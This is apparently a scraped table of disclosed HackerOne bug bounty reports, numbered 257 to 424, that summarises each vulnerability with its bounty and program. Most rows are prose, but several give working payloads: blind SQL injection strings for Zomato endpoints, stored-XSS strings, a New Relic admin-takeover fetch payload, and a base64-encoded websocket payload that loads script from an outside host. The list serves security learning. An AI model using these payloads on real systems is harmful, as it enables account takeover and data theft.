share.$100Nextcloudhttps://hackerone.com/reports/592864258HTTP Request SmugglingCL.TE based request smuggling on api.zomato.com leading to account takeover among other issues. This issue was only reproducible when using the DELETE verb. As such, make sure to test for all HTTP verbs when checking for Request Smuggling$5000Zomatohttps://hackerone.com/reports/771666259XSSReflected XSS on https://www.tumblr.com/abuse/start?prefill=<base64PL>. It only works on Firefox version 69 or lower.$250Automattichttps://hackerone.com/reports/915756260Logic BugCodeQL query to detect insecure use of postMessage. It checks if indexOf or startsWith is used to check MessageEvent.origin, which can lead to XSS or other issues.$1800GitHubhttps://hackerone.com/reports/920285261DoSDoS by sending many requests to apply for a certain job, due to relying on responses from a 3rd party server before returning.$100Maximumhttps://hackerone.com/reports/892615262Session FixationAn issue where not all sessions being terminated when the password was reset.$50Moneybirdhttps://hackerone.com/reports/743518263Improper authenticationhttps://werkenbijderet.nl/vacature-alert endpoint did not have proper rate limiting implemented, leading to being able to send thousands of mails within 10 minutes.$100Maximumhttps://hackerone.com/reports/882942264SSRFBeing able to call all internal classes, functions and parameters due to everything being declared public. This leads to blind SSRF through Gopher protocol.$300TTS Bug Bountyhttps://hackerone.com/reports/895696265IDORRead only user can delete other users through IDOR$50Heliumhttps://hackerone.com/reports/888729266Brute ForceIt is possible to brute force the login prompt of app.mopub.com due to only having IP based rate limiting. It should have CAPTCHA or block all access to the locked out account, not just add restrictions to the violating IP (as changing IPs is easy).$420Twitterhttps://hackerone.com/reports/819930267XSSReflected XSS in GET parameter$300Mail.ruhttps://hackerone.com/reports/848742268Improper access controlA partner’s superuser account could access information of drivers belonging to other partners, including passport and drivers license data$8000Mail.ruhttps://hackerone.com/reports/863983269Information leakBot Token for ICQ was leaked in GIT commit data for opensource JIRA plugin$150Mail.ruhttps://hackerone.com/reports/902064270Logic bugIt was possible to create accounts with nicknames belonging to existing accounts$150Mail.ruhttps://hackerone.com/reports/824973271XSSViewing a malicious SVG lead to access to local files (LFI?) on certain iOS versions due to cross-application scripting in the Mail.ru iOS Mail app$1000Mail.ruhttps://hackerone.com/reports/900543272Race ConditionMalicious applications could create multiple valid OAUTH sessions by abusing a race condition.$250Razerhttps://hackerone.com/reports/699112273IDORIDOR in the stocky application allows for changing columns of other users$750Shopifyhttps://hackerone.com/reports/853130274Account TakeoverIf staff/the store owner has yet to register a google account to his Shopify ID, and you have privileges to change their registered email, you can take over the account by setting their email to your gmail address. Knowing this means you can takeover accounts by having the admin be exposed to an xss performing this operation. It only works with Google Apps enabled.$2000Shopifyhttps://hackerone.com/reports/892904275Improper authenticationThe Stocky application did not have any permission checks to download purchase orders, leading to anyone being able to download the orders.$500Shopifyhttps://hackerone.com/reports/802286276CRLF InjectionIn the Synthetics “Ping” functionality, you can insert newline characters, resulting in almost full control over the email functionality. You are able to send emails to anyone, with any content. The only limitation is a small one in the “Subject” field.$500New Relichttps://hackerone.com/reports/347439277IDORThe selectAddressId in the cookie combined with the delivery_subzone in the GET request, allows for unauthenticated enumeration of all addresses registered to users. This cannot be tied to a specific user. This is due to the backend disclosing the full, stored address of a user, given that the delivery_subzone matches that associated with the selectAddressId without any further authentication$1500Zomatohttps://hackerone.com/reports/514897278Logic bugDue to not sufficiently protecting which apps can retrieve the token in the authentication flow, it is possible for a malicious application to take over the account of the user. This requires a malicious app preinstalled on the victims device to be successful.$500Shopifyhttps://hackerone.com/reports/855618279Improper authenticationAn attacker can generate app tokens through the adminGenerateSession mutation in the admin panel, as a staff member with no permissions. This would give access to a small subset of installed apps, limited to the current shop.$2000Shopifyhttps://hackerone.com/reports/898528280XSSStored XSS in admin interface through “evaluation of purchase process”-window$1500Mail.ruhttps://hackerone.com/reports/874387281DoSCertain files in /etc/ are writable. For example hosts, hostname and resolve.conf. While the last two seems to have special handling, /etc/hosts is inherently vulnerable. This leads to being able to DoS a service by writing large amounts of data to the file.$1000Kuberneteshttps://hackerone.com/reports/867699282Logic bugGraphQL query for finding incorrect hostname comparison. This is especially prevalent in Android applications.$1500GitHubhttps://hackerone.com/reports/929288283Logic bugMisconfiguration lead to being able to get SmartDNS for free for longer than it should be.$700NordVPNhttps://hackerone.com/reports/925757284XXEXXE on starbucks.com.sg/RestAPI/* leading to arbitrary file read$500Starbuckshttps://hackerone.com/reports/762251285Account TakeoverDue to improper authentication when setting up 2FA, it is possible to takeover an account given that you know the USER ID. This is not likely to leak and as such reduces the impact of this vulnerability.$100Heliumhttps://hackerone.com/reports/810880286Information DisclosureIt was possible to view thumbnails of private videos through attacking the API$750Pornhubhttps://hackerone.com/reports/138703287DoSImproper handling of renaming HackerOne groups for managing access rights for programs, leads to excessive resource use which may lead to DoS$2500HackerOnehttps://hackerone.com/reports/880187288DoSDoS through recursive evaluation. Can be done remotely by an attacker with elevated privileges.$200Kuberneteshttps://hackerone.com/reports/882923289Logic bugBy tampering requests regarding which retailers you can earn cashback from to be an empty list, you can earn cashback from all retailers on the platform. Normally premium users can only select 6 and normal users can only select 3. This can only be set once, but using this vulnerability you can switch at any time.$1000Curvehttps://hackerone.com/reports/672487290Use of weak PRNGGrammarly Keyboard for Android used weak PRNG allowing a malicious app installed on the device to guess the PKCE code value and steal the OAUTH access token of a user. Fixed by changing to SecureRandom$2000Grammarlyhttps://hackerone.com/reports/824931291Improper AuthenticationH1 SAML implementation allows for re-using SAML response for up to 10 minutes, allowing for increased risk in case an attacker can ever intercept or otherwise compromise such a request.$500HackerOnehttps://hackerone.com/reports/888930292DoSDoS of account (for Chrome) when viewing a tweet containing the link twitter.com/%00$560Twitterhttps://hackerone.com/reports/921286293IDORIDOR allows user to access pictures from other users, including EXIF data.$200IRRCloudhttps://hackerone.com/reports/906907294Information leakAfter the policy_markdown_html was added inside the team Graphql query, it was possible to enumerate if public programs also had private programs. In case they did, you could also see their internal policy.$2500HackerOnehttps://hackerone.com/reports/877642295PhishingAbility to spoof interface elements through adding tags or attributes in calendar events at calendar.mail.ru$150Mail.ruhttps://hackerone.com/reports/847473296Code injectionCodeQL query for detecting possible template injections in Python$2300Githubhttps://hackerone.com/reports/944359297XSSBy adding a link in a post and manually editing out a portion (denied:), then reblogging the post, the XSS will execute after the victim clicks the link (on the reblogged post).$350Automattichttps://hackerone.com/reports/882546298Command InjectionSince GitLab allows for code injection through Mermaid, you can achieve arbitrary PUT requests in the context of the victim through this command injection. The victim has to have the required privilege to perform the action for the attack to succeed.$3000Gitlabhttps://hackerone.com/reports/824689299SQLiAn SQL Injection existed in a Razer Gold asset due to using an outdated instance of PHPlist. The injection point is the body parameter name and not the value!$2000Razerhttps://hackerone.com/reports/824307300Code injectionDue to a vulnerability in how the executable launched related executables, it was possible to escalate privileges by abusing this issue. (Likely similar to DLL injection or unquoted path issues.) The issue was in a Cortex related service.$750Razerhttps://hackerone.com/reports/769684301IDORAn alternate site shared database and cookie credentials with card.starbucks.com.sg. By exploiting the alternate site, the hacker could copy over the cookie value and take over the account on starbucks.$6000Starbuckshttps://hackerone.com/reports/876300302Command injectionAWS S3 bucket takeover of multiple buckets. The buckets were still referenced in a test script and as such could have resulted in RCE.$12,500Mapboxhttps://hackerone.com/reports/329689303CSRFLogin CSRF via OATH code in lootdog.io allows an attacker to replace a user’s session with the attackers session.$150Mail.ruhttps://hackerone.com/reports/892986304DoSDue to relying on AJV, and also using allErrors:true, Fastify is vulnerable to DoS when there is potentially slow matching patterns or if uniqueItems is in the schema.$250Node.js third-party moduleshttps://hackerone.com/reports/903521305DoSBy submitting a very long password, the hashing algorithm on the server will take a lot of resources and potentially result in DoS due to memory exhaustion.$100Nextcloudhttps://hackerone.com/reports/840598306Information DisclosureDue to lack of access control in ajaxgetachievementsforgame, it is possible to see achievement names, display names and descriptions for unreleased games if you find a user who has the achievements for those unreleased apps (beta tester or similar)$750Valvehttps://hackerone.com/reports/835087307Open RedirectReverse tabnabbing (changing location of the original page page when opening a link in a new tab) was possible in the printing source document images functionality.$100Visma Publichttps://hackerone.com/reports/911123308Client side enforcement of Server-side SecurityDue to silently ignoring the content length header, it is possible to bypass the size check for S3 buckets and upload attachments of any size. The solution is to add content-length header to whitelisted headers.$500Ruby on Railshttps://hackerone.com/reports/789579309Logic bugWhen creating a hash, the permit function does not sufficiently protect when converting using .each(), allowing for sneaking in additional parameters that should not logically be present$500Ruby on Railshttps://hackerone.com/reports/292797310Null pointer dereferenceA lack of proper checks for user supplied data results in a null pointer dereference.$1500Open-Xchangehttps://hackerone.com/reports/827729311Use After FreeDue to incorrectly decreasing a reference counter, by sending a lot of newline characters (“\n”) you can reach code checking the cmd-variable which has previously been freed.$500Open-Xchangehttps://hackerone.com/reports/827051312IDORAccount takeover through IDOR in password recovery procedure$1500Mail.ruhttps://hackerone.com/reports/843160313IDORCould disclose attributes of arbitrary sites due to a IDOR in relap.io$750Mail.ruhttps://hackerone.com/reports/749887314XSSBy uploading a PNG with JS and XML code, and adding it to a Wiki page, it was possible to achieve stored XSS$1500GitLabhttps://hackerone.com/reports/880099315Improper Access ControlLack of access control on the ListMembers query allowed for enumeration of members in private lists. Finding the TwitterID is difficult, but can be done by brute force by attacking different endpoints. To further show impact, it was demonstrated that x-response-time header discloses if the lists exists or not.$2940Twitterhttps://hackerone.com/reports/885539316XSSStored XSS through the blob-viewer. The payload is in the description field.$2000GitLabhttps://hackerone.com/reports/806571317SSRFChaining redirects in grafana allows for SSRF using any HTTP verb to any arbitrary endpoint. For more information, see Rhynorater’s talk at HactivityCon 2020.$12,000GitLabhttps://hackerone.com/reports/878779318Logic bugBy supplying an attacker controlled link, the attacker can get a copy of the PoC, if the victim (person creating a poc) submits the details on the page. There were multiple bypasses possible due to a loosely configured regex, which was fixed.$1000BugPochttps://hackerone.com/reports/926221319Logic bugDue to lack of association checks between 3rd party wallet IDs and user IDs, it was possible to purchase Zomato Gold memberships using other user’s 3rd party wallets, effectively having them pay for it.$2000Zomatohttps://hackerone.com/reports/938021320Logic bugAbility to decrease payment by maximum 1 currency unit (0.99) for any purchase$150Zomatohttps://hackerone.com/reports/927661321Improper access controlAccess control issue due to not correctly checking permissions in the active session for the user$100Visma Publichttps://hackerone.com/reports/812143322Information leakAbility to see error message related to character encoding from SQL operation by adding the poop-emoji to the email field during registration$100Unikrnhttps://hackerone.com/reports/866271323SQL InjectionSOLR injection through adding \to the query.$100Zomatohttps://hackerone.com/reports/844428324SQL InjectionBlind SQLi in res_id of /php/geto2banner. PoC is res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0$2000Zomatohttps://hackerone.com/reports/838855325SQL InjectionSame as #326, but on a different endpoint: /php/widgets_handler.php. PoC: :/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(​version()​)=​10​)THEN(SLEEP(6*1))END$2000Zomatohttps://hackerone.com/reports/836079326Improper access controlThe food.grammarly.io site uses Meter framework, and is lacking proper authorization for sensitive endpoints. The attacker could leak user data and employee data, including access tokens, by calling the functions directly from JS (for example in dev tools)$1000Grammarlyhttps://hackerone.com/reports/745495327SQL InjectionThe reporter identified a SOLR injection on the user_id parameter at :/v2/leaderboard_v2.json. This had low impact, but the internal team found a boolean based blind SQLi in the same codebase when investigating and rewarded the report as such.$2000Zomatohttps://hackerone.com/reports/952501328Special element injectionSOLR injection similar to #324, but on a different endpoint. PoC :v2/red/homepage.json?lat=&lon=&city_id={!dismax+df=city_id}86&android_country=US&lang=en&android_language=en$150Zomatohttps://hackerone.com/reports/953203329Missing authorizationMissing authorization checks lead to a user only allowed to do sales being able to record payments he was not supposed to$250Visma Publichttps://hackerone.com/reports/919008330SSRFCodeQL query for detecting SSRF issues in Golang libraries and code$1800Github Security labhttps://hackerone.com/reports/956296331LDAP InjectionCodeQL query for detecting LDAP injections in Java, supporting Java JNDI, UnboundID, SPring LDAP and Apache LDAP API$2500Github Security labhttps://hackerone.com/reports/956295332XSSStored XSS through the chartbuilder in one.newrelic.com. Payload: SELECT '“><img src=x onerror=alert(document.domain)> "' Style=position\' FROM SyntheticCheck$2500New Relichttps://hackerone.com/reports/634692333Information leakAble to view full name of users who are not yet part of your account. This can be achieved by creating a note, viewing it and trying to share it with the invited account.$750New Relichttps://hackerone.com/reports/476958334Privilege escalationRestricted users are able to delete Key transaction tags through the GUI even though they should only have READ-access.$750New Relichttps://hackerone.com/reports/638685335Privilege escalationAn unrestricted user is able to view the application token for a mobile app by directly visiting the /deploy endpoint for the app.$500New Relichttps://hackerone.com/reports/479139336IDORAccess to a subset of a victims Insights Dashboards through a GraphQL query with insufficient validation$1500New Relichttps://hackerone.com/reports/765565337Logic bugAbility to buy PRO subscriptions for reduced prices by tampering the pr. unit price$203.5New Relichttps://hackerone.com/reports/783688338Improper access controlRestricted users are able to delete NerdStorage documents created/owned by any user on that account, through GraphQL query.$600New Relichttps://hackerone.com/reports/766145339Improper access controlA restricted user was able to update the Aodex target for an application by abusing a GraphQL mutation without proper validation and authorization$626New Relichttps://hackerone.com/reports/776449340Violation of secure design principlesIt was not possible to delete API keys in the application, even though the GUI said it was possible and the action succeeded. This was true even for users with an Admin/Owner role.$500New Relichttps://hackerone.com/reports/782703341Code injectionBy abusing a CSRF vulnerability in the admin panel, the reporters were able to achieve stored XSS. Then, using the stored XSS vulnerability, they managed to escalate the vulnerability to RCE. The attack required Social Engineering of a WordPress Admin (to click the initial link) to be successful$506New Relichttps://hackerone.com/reports/941421342Improper access controlA test endpoint for Synthetic monitors was found by the reporter. It did not validate permissions of the user, causing low privileged users to be able to create monitors using Secure Credentials$500New Relichttps://hackerone.com/reports/788499343IDORThe reporter found a way to link an account with any Partnership as long as the ID was known. It was resolved by adding proper validation.$695New Relichttps://hackerone.com/reports/786109344XSSStored XSS in the Synthetics private locations list. Both the Label and Description fields were vulnerable. PoC: </script><script>alert(document.domain)</script>$2500New Relichttps://hackerone.com/reports/680240345Improper access controlRestricted users are able to create, edit and remove tags from the NerdGraph entities.$750New Relichttps://hackerone.com/reports/757957346XSSStored XSS in the “Position” field when applying for “Support/Moderator” jobs at recruit.innogames.de$500Innogameshttps://hackerone.com/reports/917250347IDORAn endpoint for testing Synthetics monitors without proper validation allowed monitors from other accounts to run on your account, given that they knew the monitors ID (on victims account)$2500New Relichttps://hackerone.com/reports/787886348XSSStored XSS across accounts through the embedded charts page. The vulnerable field is chart_title and the PoC is: </script><script>alert(document.domain)</script>. Multiple bypasses was also found for this issue$3625New Relichttps://hackerone.com/reports/709883349XSSStored XSS in the transactionName field of the Beta map functionality. PoC is a simple "-alert(document.domain)-"$2500New Relichttps://hackerone.com/reports/667770350XSSCross account stored XSS by injecting the payload into a chart, when it is displayed inside a note. The exploit abuses the href attribute by using a javascript:alert()" payload. This XSS requires no user interaction.$4250New Relichttps://hackerone.com/reports/507132351Improper access controlThere was a misconfiguration in CORS-policy where all assets trusted the domain nr3.nr-assets.net where users can upload arbitrary content. (For example Nerdlet artifacts) This allows an attacker to upload malicious files of arbitrary types and execute arbitrary actions on behalf of the victim in various ways due to the incorrect configuration. Valid fixes are either to move user content to another sandbox domain or to amend the CORS policy.$3125New Relichttps://hackerone.com/reports/751699352Information disclosureCORS misconfiguration allows requests from sandbox containing user apps, leading to potential disclosure of nerdpacks, nerdlets, and launcher ID’s, and also source code of the victims app.$625New Relichttps://hackerone.com/reports/746786353XSSStored XSS in admin interface when creating a new alert. By formatting the url as: user:[email protected] the server accepts the payload, which is: javascript:fetch("https://rpm.newrelic.com/user_management/accounts/{ACCOUNT_ID}/update_primary_admin?value={ATTACKER_ID}",{method:"PUT",headers:{"X-Requested-With":"XMLHttpRequest"}}).then(function(_){alert("you_have_lost_your_ownership");close()})//@asd.com$1337New Relichttps://hackerone.com/reports/605845354Memory CorruptionMissing best practices like having ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention) and CFG (Control Flow Guard) enabled is lacking$50Nextcloudhttps://hackerone.com/reports/380102355DoSDenial of Service by poisoning the cache with invalid CORS Header, due to an endpoint echoing back and setting the CORS Allow-OriginHeader to the supplied “origin” value.$200Automattichttps://hackerone.com/reports/921704356XSSWhen connecting to an invalid website, it launches a pop-up which can contain attacker-controlled content. By using file-scheme, for example, you can trick users into launching arbitrary files on the local machine$100Nextcloudhttps://hackerone.com/reports/685552357Path TraversalThe linux client is vulnerable to an attack where an administrator can inject path traversal payloads into filenames (../) in order to write files to arbitrary locations within the control of the nextcloud app, on the victims machine. It only allows for creating new files, not modify existing ones, and needs to be continously exploited to have effect.$250Nextcloudhttps://hackerone.com/reports/590319358SSRFSSRF in PlantUML staging server, due to accepting the !include function.$100GitLabhttps://hackerone.com/reports/689245359XSSStored XSS due to improper filtering of attributes after admin has edited them.$650WordPresshttps://hackerone.com/reports/633231360XSSStored XSS due to improper filtering of attributes after admin has edited them. Different case from #359$650WordPresshttps://hackerone.com/reports/497724361XSSStored XSS in First and Last Name field for “Staff” account$3000Shopifyhttps://hackerone.com/reports/948929362Privilege EscalationAn attacker can register an account with an email, get permissions and then be deleted. After being deleted, by accessing accounts.shopify.com with the now deleted account, you still have access.$1000Shopifyhttps://hackerone.com/reports/870001363Information disclosureA bug in graphql access controlled allowed an attacker with “customer” permissions to leak additional data they should not have access to, from orders.$1500Shopifyhttps://hackerone.com/reports/882412364Information disclosureBy first getting an API key, then querying for specific data, staff members can access data they are not supposed to have access to.$1000Shopifyhttps://hackerone.com/reports/901775365Information disclosureUsers without any permission can access certain store information through GraphQL query.$500Shopifyhttps://hackerone.com/reports/409973366XSSReflected XSS through the skuNo & skuImgUrl parameters at https://www.istarbucks.co.kr/app/getGiftStock.do$250Starbuckshttps://hackerone.com/reports/768345367Improper access controlPassword reset link can be used to reset password multiple times.$500Shopifyhttps://hackerone.com/reports/898841368IDORThe last 4 digits of a registered credit card could be obtained through error messages on the /profile_payment/saveendpoint by abusing an IDOR$500Yelphttps://hackerone.com/reports/361984369IDORAn IDOR allowed an attacker to order food on GrubHub by using someone elses credit card on the /checkout/transaction_platform endpoint.$2500Yelphttps://hackerone.com/reports/391092370IDORAn IDOR on the /rewards/signup endpoint allowed an attacker to associate a random credit card to their account. While it could not be used. it allowed for viewing the transaction history and cash back amounts received$2000Yelphttps://hackerone.com/reports/358143371Stack overflowHalf Life 1 allows taking arguments from command-line to launch a mod/specific game. This is done through -game <arg>. The argument is copied using strcopy resulting in an overflow being possible.$1150Valvehttps://hackerone.com/reports/832750372Buffer OverflowBy loading a malicious map-file (.bsp) an attacker can achieve RCE on any victim, if they load the map. This works on any GoldSrc game$450Valvehttps://hackerone.com/reports/763403373Buffer OverflowThe spk console command has no length check before copying it into a stack based buffer, leading to being able to achieve RCE by having a victim load a malicious .cfg file.$350Valvehttps://hackerone.com/reports/769014374IDORAn IDOR when creating shipping labels allows an attacker to request print labels (and I assume see the information related to the order) for stores he does not have access to.$1000Shopifyhttps://hackerone.com/reports/884159375Improper authenticationThe getLoginStatus call in Digits allows an attacker to retrieve OAuth Credentials for any account, due to improperly verifying domains by utilizing the referer header. If this header was empty, the application considered the request valid, which was the issue.$5040Twitterhttps://hackerone.com/reports/168116376Information disclosureCodeQL query to detect logging of potentially sensitive information in JS based applications$1800Github Security Labhttps://hackerone.com/reports/963816377Information disclosureCodeQL query to detect basic authentication over HTTP in java.net and Apache HttpClient libraries. This is vulnerable due to basic auth only using base64 encoding and being easily reversible.$2300Github Security Labhttps://hackerone.com/reports/963815378DoSLodash V.4.17.15 was vulnerable to prototype pollution, allowing for potential DoS.$250NodeJS 3rd party moduleshttps://hackerone.com/reports/864701379Privacy ViolationClickjacking was possible during the payment process, leading to an attacker being able to trick the victim into paying for items using their stored credit card.$400Yelphttps://hackerone.com/reports/391385380UI Redressing (Clickjacking)Multiple endpoints were vulnerable to clickjacking.$500Yelphttps://hackerone.com/reports/305128381UI Redressing (Clickjacking)Clickjacking was possible on the /reservations endpoint, possibly allowing an attacker to leak information of a victim or incurring monetary loss for the victim$500Yelphttps://hackerone.com/reports/355859382Information disclosureIt is possible to disclose all details about all pentesters invited to a test, regardless if they accepted or not. This allows leaking sensitive information.$500HackerOnehttps://hackerone.com/reports/958374383XSSStored XSS through the dashboard builder within New Relic One.$2500New Relichttps://hackerone.com/reports/626082384Privilege EscalationSynthetics did not have the matching permissions compared to other functionality, allowing for users to have higher privileges than intended.$750New Relichttps://hackerone.com/reports/387290385Privilege EscalationDue to changing to use Zuora for managing customer subscriptions, members who do not have such access through the New Relic platform, can access the information through the Zoura API.$900New Relichttps://hackerone.com/reports/501672386XSSStored XSS via role name in JSON chart, which was part of a prerelease UI. Payload was: /*\"<sVg/oNloAd=alert(document.domain)//>\x3e$2500New Relichttps://hackerone.com/reports/520630387Improper authenticationRestricted users were able to delete filter sets used by admin users in https://infrastructure.newrelic.com/accounts/{{ACC#}}/settings/filterSets$250New Relichttps://hackerone.com/reports/202501388Privilege escalationBy being invited as a staff member and becoming a partner, then revoking said permission, the previous account still has access to the partner store (? Hard to understand from report)$1500Shopifyhttps://hackerone.com/reports/911857389XSSIt is possible to achieve stored XSS when creating a menu item. The XSS fires when you try to delete said item.$1000Shopifyhttps://hackerone.com/reports/887879390Information disclosureStaff members with No Permission could not access data through web, but by using the Android application the member can access Order Details via the exchangeReceiptSend call$1000Shopifyhttps://hackerone.com/reports/917875391Privilege escalationA malicious admin can create additional admin accounts without notifying / it being visible to other admins.$500Shopifyhttps://hackerone.com/reports/962895392Path traversalIt is possible to use path traversal in order to access arbitrary paths on the OAuth app as an anonymous user$500Shopifyhttps://hackerone.com/reports/869888393Violation of secure design principlesIf you change country information in Account settings, hackerone does not send you a “Your profile was recently changed” notification email.$500Hackeronehttps://hackerone.com/reports/961841394Information disclosureBy fetching a valid token from another store, it was possible to bypass the password-restriction on stores in preview mode.$1500Shopifyhttps://hackerone.com/reports/961929395XSSBy setting the name of the folder containing a broken theme to a XSS payload, XSS can be achieved. This requires installing an attacker-supplied theme or write-access to the file system.$300WordPresshttps://hackerone.com/reports/406289396XSSSelf-xss on Timeline by using javascript: protocol$500Shopifyhttps://hackerone.com/reports/854299397Improper access controlScript Editor tokens do not expire and thus, scripts can still be edited and added if you have the token, even if the Script Editor application is uninstalled. The scripts can also no longer be seen or edited unless manually accessing/calling the API if the script is renamed to an empty character.$2000Shopifyhttps://hackerone.com/reports/915940398Information disclosureWithin the same company, it was possible to access data one should not be able to, when having the Auditor role.$100Visma Publichttps://hackerone.com/reports/959897399Privilege EscalationBy navigating directly to the relevant endpoints instead of relying on the UI, and restricted user is able to create integrations with AWS, even though his role forbids this.$750New Relichttps://hackerone.com/reports/255685400Privilege EscalationBy logging in to New Relic Synthetics with no permissions, observing calls allows you to identify a call returning all data about the monitor’s and permissions for the group.$750New Relichttps://hackerone.com/reports/320689401IDORBy adding a new user to your New Relic account as an admin, you are able to disclose their full name on the https://alerts.newrelic.com/accounts/ACCOUNT_ID/channelspage$1500New Relichttps://hackerone.com/reports/344309402IDORWhen creating an account for a new user, the admin cannot see the name of the account holder. This vulnerability allowed an attacker to disclose such data through the API endpoint https://alerts.newrelic.com/internal_api/1/accounts/YOURACCOUNTNUMBER/users/$1500New Relichttps://hackerone.com/reports/332381403Improper access controlIf a permanent maintainer creates a mirror then removes it, any other project maintainer can create a mirror that is similar to the first one created. This is contrary to what documentations states and can allow an attacker to plant backdoors or push to a repository after being removed from the project.$3000GitLabhttps://hackerone.com/reports/819821404IDORBy creating an account on customers.gitlab.com, then linking it to the victims account by using their userId (it is sequential and easy to get), you will: 1. Remove all subscriptions, 2. Get access to all future updates, including credit card registration!, 3. Attacker can use registered information.$3500GitLabhttps://hackerone.com/reports/674195405Privilege EscalationIf a gitlab admin uses the impersonate function, the admin cookie will be replaced with the user cookie and have a “Stop impersonating” button available to return to the admin account. This session shows up in the sessions overview of the user, so if the user switches to this session, he can click the “Stop impersonating”-button and get admin access.$10,000GitLabhttps://hackerone.com/reports/493324406Logic bugAn attacker was able to run arbitrary pipeline jobs as the victim. By creating a repository and a mirrored project with trigger pipelines for mirror updates enabled, and then inviting the victim as an owner, then deleting the original owner, the pipeline will execute in the context of the victim account.$12,000GitLabhttps://hackerone.com/reports/894569407XSSStored XSS in groups, by naming the group as an XSS payload – "><img src=x onerror=prompt(123)> – and clicking New Project$2500GitLabhttps://hackerone.com/reports/647130408Improper access controlThe jira_status field has an issue with sort_by allowing an attacker to see if a report is using Jira or not.$550Hackeronehttps://hackerone.com/reports/955286409XSSStored XSS on eaccounting.stage.vismaonline.com$250Visma Publichttps://hackerone.com/reports/897523410CSRFDue to disclosing part of the authenticity token used to generate csrf tokens. Using this, an attacker can generate valid CSRF tokens for any arbitrary route.$500Ruby on Railshttps://hackerone.com/reports/732415411Improper access controlAbility to publish any theme for free, by extracting the ID of the paid theme, and then intercepting the update to a free theme and replacing that ID with the ID of the paid theme.$2000Shopifyhttps://hackerone.com/reports/927567412Improper access controlAbility to publish any theme for free, by race condition when installing the theme. This is done by finding a paid theme and clicking the Try theme button. Then, while it is installing, issuing the PublishLegacy call for a free theme. Then intercept and modify the first GraphQL Query to ThemesProcessingLegacy where you replace the theme ID with the paid theme ID.$2000Shopifyhttps://hackerone.com/reports/953083413XSSFile upload with a unicode character and XSS payload causes the webpage created to execute the script$600WordPresshttps://hackerone.com/reports/179695414Code injectionXSS to RCE by uploading html as part of a snippet. The map-function allows arbitrary inclusion of resources, leading to being able to execute any command. There are also multiple issues with storage of payloads in Slack’s environment, leading to being able to host code on trusted domains.$1750Slackhttps://hackerone.com/reports/783877415XSSDue to taking unsantizied input from websockets and rendering it on the recipients side, it is possible to achieve XSS on support desk conversations and gain access to support tickets and client information. The payload was: ws.send('{"action":"send_message","data":{"type":2,"uuid":"katO0xuiIy","media_thumb":"xxdata\\" onerror=\\"eval(atob(\'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vcGl0ci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7\'));//","media_url":"media-url"},"uuid":"katO0xuiIy","token":"bz+OjfTeBL/BRozszXwKbT10voEb0crFVRWBktvQifQ=","projectId":1,"messengerType":9}')$500QiWihttps://hackerone.com/reports/512065416Improper authenticationDue to improper parsing and display of the from address, it was possible to send emails from any @mail.ru address while passing DKIM and DMARC verification, even though the email is spoofed. The bug happens when there are two “From” headers and the incorrect, but spoofed address is added as “From: “. This attack is also a replay-attack where you require a previously sent and verified email from the address provider.$150Mail.ruhttps://hackerone.com/reports/731878417IDORIDOR in dictor.mail.ru allowed an attacker to get any video information through GraphQL query$2500Mail.ruhttps://hackerone.com/reports/924914418Information disclosureConfig files were accessible for warofdragons.my.games, leaking database credentials and other information$150Mail.ruhttps://hackerone.com/reports/786609419CRLF injectionwww.starbucks.com/email-prospectt was vulnerable to CRLF injection allowing for header injection (for example injecting CORS headers) or HTTP response splitting, which can be further exploited.$250Starbuckshttps://hackerone.com/reports/858650420XSSIt is possible to achieve stored XSS if an attacker can upload files using Active storage, by utilizing the proxy-functionality included in Ruby on Rails.$500Ruby on Railshttps://hackerone.com/reports/949513421XSSIt was possible to achieve stored XSS in the Post title on Imgur. This was achieved using a standard "><svg payload.$250Imgurhttps://hackerone.com/reports/942859422Logic bugEmail bypass for shopify accounts that did not have Shopify IDs. This allowed an attacker to exploit a flaw in the flow, allowing for taking over these accounts without any verification.$22,500Shopifyhttps://hackerone.com/reports/867513423Information leakAnonymous access to a Sidekiq process dashboard was possible on shopper.sbermarket.ru$500Mail.ruhttps://hackerone.com/reports/951190424DoSBrowser-dependent DoS by injecting invalid link: http://twitter.com:627732462